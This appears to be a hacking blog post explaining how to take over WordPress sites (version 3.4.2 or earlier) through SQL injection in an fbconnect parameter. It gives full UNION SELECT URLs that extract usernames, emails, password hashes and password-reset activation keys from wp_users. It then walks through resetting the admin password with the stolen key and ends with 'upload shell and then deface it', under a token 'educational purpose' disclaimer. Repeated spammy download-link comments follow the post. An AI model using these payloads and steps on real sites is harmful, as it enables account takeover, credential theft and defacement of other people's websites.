As we all know now the worpdress blogs are using higher alogrithem to encrypt blog passwords, which are not easy to crack. The only methods to crack these hashes is Brute Force but brute force takes too much time.
Now lets get started--->
Things you need --->
1. Wordpress version <= 3.4.2
2. Sql injection vulnerable wordpress site(make sure version of wp site is 3.4.2 or less than it)
Lets start --->
Find SQLi vulnerable worpdress site.
Like i get www.site.com?fbconnect_action=myhome&fbuserid=1
nw add this code after the wordpress site address
+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
Nw address will look like
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
lets start pwning
First go to http://target.com/wp-login.php
Now click on Lost your password ?
Now click on Lost your password ?
Now the wordpress will ask you for the username or email, enter the username or email id which you got on the field and click get password.
Now it will be saying "Check your e-mail for the confirmation link."
now what wordpress does is it sends an activation key to the email address also it sets the value of activation key in the database as well.
we will be getting the user activation key by sqli this is what its all about.
Add column name user_activation_key to extract
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--
Now you will be able to see the activation key
Now .. finally all we have to do is enter the following url to end of the site and edit it with your activation key and username
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
eg:- http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin
Now the wordpress will ask u for ur new password enter your desired password & click change.
Now upload shell and then deface it.
Note -->
1. Only for educational purpose.
2. This hack only works on Worpdress versions 3.4.2 or less than it..
Aditya World: Hacking Wordpress Without Hash Cracking >>>>> Download Now
ReplyDelete>>>>> Download Full
Aditya World: Hacking Wordpress Without Hash Cracking >>>>> Download LINK
>>>>> Download Now
Aditya World: Hacking Wordpress Without Hash Cracking >>>>> Download Full
>>>>> Download LINK